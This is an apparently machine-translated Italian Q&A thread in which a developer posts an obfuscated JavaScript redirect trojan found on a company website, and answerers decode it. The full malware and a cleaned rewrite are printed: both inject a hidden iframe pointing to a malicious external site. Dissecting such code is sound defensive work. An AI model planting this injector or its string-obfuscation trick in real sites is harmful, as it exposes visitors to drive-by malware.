1. casa
  2. Domanda e risposta
  3. JavaScript dissezione trojan

JavaScript dissezione trojan

2010-07-20 8 views
7

Recentemente ho giocato con l'attributo di JavaScript e ho iniziato a considerare che non potevo incontrare un pezzo di JavaScript che non sarei in grado di eseguire il debug.JavaScript dissezione trojan

Bene Sono rimasto piacevolmente sorpreso e adirato oggi quando abbiamo scoperto un numero di trojan di reindirizzamento JavaScript sul sito Web della nostra azienda.

Gran parte del codice trovato è stato in grado di sezionare facilmente e utilizzare l'escape standard per offuscare la funzione dei codici.

Ma tra il codice che abbiamo trovato il codice seguente mi ha completamente bloccato su quello che sta facendo. (L'unica parte che mi sembra di capire è che sta facendo una sostituzione su alcuni parametri).

Quindi qualcuno dovrebbe essere così gentile da analizzare il seguente codice per me? Mi piacerebbe sapere esattamente cosa sta succedendo ...

<script> 

function yJ() {}; 
this.sMZ = "sMZ"; 
yJ.prototype = { 
    w: function() { 
     var rJ = 13390; 
     this.m = "m"; 
     this.fP = ''; 
     this.q = "q"; 
     this.oJ = ""; 
     var vS = function() { 
      return 'vS' 
     }; 
     var d = 'replace'; 
     var qB = ""; 
     x = ''; 
     var s = document; 
     var xZ = "xZ"; 
     mC = ''; 
     var dV = "dV"; 
     var b = window; 
     this.p = false; 
     this.kX = ''; 
     nP = "nP"; 
     var zE = ""; 
     this.nU = false; 
     var yV = function() { 
      return 'yV' 
     }; 
     String.prototype.gT = function (l, v) { 
      return this[d](l, v) 
     }; 
     this.pC = ''; 
     var qV = false; 
     var fPU = new Array(); 
     h = ""; 
     var sV = 'sKe}tKTIiWmEe}oEu}tK'.gT(/[KE\}IW]/g, ''); 
     var xV = 43258; 
     sT = ''; 
     var mV = ''; 
     this.wJ = "wJ"; 
     var f = '<jhItImIlI I>j<IhjezaIdz ;>;<z/;hjeIaIdI>;<zb!ojdjyj ;>I<!/jbIo!d!yI>z<j/Ihjt;m;lj>!'.gT(/[\!Ijz;]/g, ''); 
     var xB = ''; 
     wI = "wI"; 
     oT = false; 
     var nQ = 49042; 
     try { 
      zI = ''; 
      var bF = new Array(); 
      var aY = function() { 
       return 'aY' 
      }; 
      var rN = false; 
      rF = ""; 
      var cX = function() { 
       return 'cX' 
      }; 
      var y = 'bToTdTy+'.gT(/[\+\]aT%]/g, ''); 
      this.rL = ''; 
      var vH = function() { 
       return 'vH' 
      }; 
      var r = 'sStEy9l?eE'.gT(/[ES9\?m]/g, ''); 
      yD = ""; 
      var eA = ''; 
      var bQ = 'i.fWrhalmlel'.gT(/[lW\.xh]/g, ''); 
      vZ = ''; 
      this.bG = ""; 
      this.vL = false; 
      var t = 'w5r[i5t[e%'.gT(/[%C5\[U]/g, ''); 
      gI = ''; 
      dVL = "dVL"; 
      var n = 'cZrzeZaZtze.E.l.e;m;eSnzt;'.gT(/[;SZz\.]/g, ''); 
      lH = ""; 
      kD = "kD"; 
      this.pH = false; 
      var k = 's9ric9'.gT(/[9Ni~O]/g, ''); 
      var vB = ''; 
      var kH = function() { 
       return 'kH' 
      }; 
      var qH = new Array(); 
      aD = ''; 
      this.eQ = false; 
      var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, ''); 
      var cT = ''; 
      var kL = function() { 
       return 'kL' 
      }; 
      var bR = new Array(); 
      this.cP = 22454; 
      var dH = 'hNi9d0d>e*n*'.gT(/[\*9N\>0]/g, ''); 
      lG = ''; 
      tG = 7587; 
      hV = ''; 
      this.oR = "oR"; 
      var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, ''); 
      var dC = function() {}; 
      var eR = new Date(); 
      var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, ''); 
      uM = ""; 
      var i = function() {}; 
      this.cI = ""; 
      tU = false; 

      function qN() {}; 
      xL = 57256; 
      var c = this.a(); 
      this.eL = ''; 
      var rY = function() {}; 
      fG = false; 
      nO = false; 
      this.j = ""; 
      this.iQ = 5330; 
      var sY = function() {}; 
      var u = document[n](bQ); 
      this.tH = false; 
      zX = ""; 
      u[r][o] = dH; 
      var kV = "kV"; 
      pN = ''; 
      var yG = new Array(); 
      this.nOE = 818; 
      u[z](k, c); 
      this.bQK = ""; 
      var yU = 15629; 
      var sM = new Array(); 
      var eY = "eY"; 
      var qP = ''; 
      s[y][e](u); 
      var lU = "lU"; 
      var zR = false; 
      var xS = ""; 
      iX = 34795; 

      function pO() {}; 
      this.gM = ""; 
     } catch (g) { 
      var xI = false; 
      this.gO = false; 
      this.iZ = false; 
      this.iU = false; 
      var mQ = new Date(); 
      var qF = function() {}; 
      s.write(f); 
      var tS = "tS"; 

      function aR() {}; 
      nA = "nA"; 
      var xT = new Date(); 
      mZ = false; 
      var gN = new Array(); 
      var wE = this; 
      var eB = 3562; 
      this.qE = "qE"; 
      this.cS = false; 
      this.vK = false; 
      qEJ = false; 
      this.hW = false; 
      b[sV](function() { 
       function bI() {}; 
       hJ = ""; 
       var kVQ = "kVQ"; 
       var iG = ""; 
       var eBS = new Array(); 
       rA = ""; 
       wE.w(); 
       jY = ""; 
       var hB = "hB"; 
       var iZF = ''; 
       qY = ""; 
       jYG = ""; 
       uK = 30969; 
       var qD = "qD"; 
      }, 326); 
      this.qC = ""; 
      var aX = function() {}; 
      var cN = ""; 
     } 
     gB = false; 
     var fF = false; 
     this.hX = false; 
    }, 
    a: function() { 
     rH = "rH"; 
     this.bV = ''; 
     var qW = ""; 
     return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, ''); 
     var sMS = new Array(); 
     this.wL = false; 
     uS = "uS"; 

     function pI() {}; 
    } 
}; 
var uI = false; 
var kN = new yJ(); 
this.aQ = "aQ"; 
kN.w(); 
hT = 15101; 

</script>

fonte

2010-07-20 Maxim Gershkovich

+3

Ho appena letto le prime 30 lettere del codice, io schiaffeggiato, ha fatto un caffè, si sedette e notato non c'è una barra di scorrimento. – Marko

risposta

17

Esso incorpora http://fancycake.xxx/something, e questa è la linea in cui si può vedere:

return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');

Vedete come ogni personaggio strano, quando colto da quella stringa, forma l'URL. Non ho eseguito questo, quindi non sono sicuro in quali condizioni lo fa, ma è possibile vedere che String.replace è stato rinominato in String.gT e viene passato un regex contro i caratteri che rendono la stringa offuscata. Se si applica lo stesso metodo, spiumatura personaggi strani, si può vedere che c'è un iframe nascosto, alcuni javascript gestori di eventi, setAttribute, ecc:

var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, ''); 
var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, ''); 
var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');

Questo è il modo in String.replace è aliasing:

var d = 'replace'; 

... 
String.prototype.gT = function (l, v) { 
    return this[d](l, v) 
};

Nel contesto di tale funzione, this è la stringa su cui viene chiamato gT e d è la stringa replace. Sul prototipo di una stringa, this['replace'] restituisce il metodo replace(), che viene quindi chiamato con i due argomenti su gT. Il risultato viene quindi restituito.

Aggiornamento

ho trasformato lo script in questo modo:

  1. sostituito tutte string.gT() le chiamate con le loro forme semplici.
  2. Rimossa qualsiasi variabile a cui non si fa riferimento.
  3. Gave ha alcuni nomi di buon senso.

Questo è il risultato, dovrebbe essere abbastanza chiaro come funziona la società:

function FancyCake() {}; 
FancyCake.prototype = { 
    embed: function() { 
     var d = 'replace'; 
     var s = document; 
     var b = window; 
     var sV = 'setTimeout'; 
     var f = "<html ><head ></head><body ></body></html>"; 
     try { 
      zI = ''; 
      var bF = new Array(); 
      var y = 'body'; 
      var r = 'style'; 
      var bQ = 'iframe'; 
      var t = 'write'; 
      var n = 'createElement'; 
      var k = 'src'; 
      var z = 'setAttribute'; 
      var dH = 'hidden'; 
      var o = 'visibility'; 
      var e = 'appendChild'; 
      var c = this.getUrl(); 
      var u = document[n](bQ); 
      u[r][o] = dH; 
      u[z](k, c); 
      s[y][e](u); 
     } catch (e) { 
      console.error(e); 
      s.write(f); 
      var cake = this; 
      b[sV](function() { 
       cake.embed(); 
      }, 326); 
     } 
    }, 
    getUrl: function() { 
     return "http://fancycake.net/.ph/1/"; 
    } 
}; 

var cake = new FancyCake(); 
cake.embed();

fonte

2010-07-20 08:33:10

+1

+ per la spiegazione –

+0

Non mi è venuto in mente che quello che stavo guardando era regex tra tutto quel casino. Quello che non ottengo adesso è ok, ho capito l'idea di base della parola chiave prototipo, ma come si fa a restituire questo [d] (l, v) come risultato di un override della corrispondenza del pattern regex? oppure cosa stanno cercando di ottenere in quella linea di codice? PS: Grazie per la spiegazione perché ovviamente l'ho inserito in un debugger ma ho ancora faticato a capirlo. –

+0

Ho aggiornato la risposta per includere una spiegazione sulla sostituzione. –

4

Si aggiunge un iFrame invisibile al seguente URL al tuo sito web:

<iframe style="visibility: hidden;" src="http://fancycake.net/.ph/1/"></iframe>

Il sito è contrassegnato come fancycake attaccato e dannoso sotto Firefox

fonte

2010-07-20 08:13:51 Erik

+0

Come l'hai scoperto? –

+1

eseguendolo in un Debugger JavaScript e guardando cosa stava succedendo. Dopo questo, ho navigato per l'URL iframe e ho visto l'avviso di Firefox :) – Erik

1

Eseguirlo in un debugger JavaScript; alla fine, il codice si decompilerà e cercherà di avviarsi. Suggerisco di usare l'ultima versione di FireFox, magari su una macchina Linux, per essere al sicuro.

fonte

2010-07-20 08:21:22

Problemi correlati

 Problemi correlati